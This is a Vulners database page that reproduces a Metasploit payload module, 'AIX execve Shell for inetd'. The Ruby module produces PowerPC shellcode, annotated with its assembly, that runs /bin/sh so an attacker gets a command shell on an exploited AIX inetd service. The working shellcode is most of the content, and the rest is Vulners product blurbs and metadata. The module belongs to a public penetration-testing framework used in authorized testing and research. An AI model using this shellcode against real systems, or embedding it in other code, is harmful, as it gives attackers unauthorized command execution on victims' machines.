Lucene search
K

AIX execve Shell for inetd

🗓️ 08 Feb 2010 00:44:37Reported by jduck <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

AIX execve Shell for inetd module, simply execve /bin/s

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


module MetasploitModule

  CachedSize = 56

  include Msf::Payload::Single
  include Msf::Payload::Aix
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'AIX execve Shell for inetd',
      'Description'   => 'Simply execve /bin/sh (for inetd programs)',
      'Author'        => 'jduck',
      'License'       => MSF_LICENSE,
      'Platform'      => 'aix',
      'Arch'          => ARCH_PPC,
      'PayloadType'   => 'cmd_interact',
      'Handler'       => Msf::Handler::FindShell,
      'Session'       => Msf::Sessions::CommandShell
    ))

  end

  def generate(*args)
    super(*args)

    payload =
      "\x7c\xa5\x2a\x79"     + # /* xor.    r5,r5,r5             */
      "\x40\x82\xff\xfd"     + # /* bnel    <shellcode>          */
      "\x7f\xe8\x02\xa6"     + # /* mflr    r31                  */
      "\x3b\xff\x01\x20"     + # /* cal     r31,0x120(r31)       */
      "\x38\x7f\xff\x08"     + # /* cal     r3,-248(r31)         */
      "\x38\x9f\xff\x10"     + # /* cal     r4,-240(r31)         */
      "\x90\x7f\xff\x10"     + # /* st      r3,-240(r31)         */
      "\x90\xbf\xff\x14"     + # /* st      r5,-236(r31)         */
      "\x88\x5f\xff\x0f"     + # /* lbz     r2,-241(r31)         */
      "\x98\xbf\xff\x0f"     + # /* stb     r5,-241(r31)         */
      "\x4c\xc6\x33\x42"     + # /* crorc   cr6,cr6,cr6          */
      "\x44\xff\xff\x02"     + # /* svca                         */
      "/bin/sh"+
      "\x05"

  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

05 Jan 2021 14:59Current
0.6Low risk
Vulners AI Score0.6
16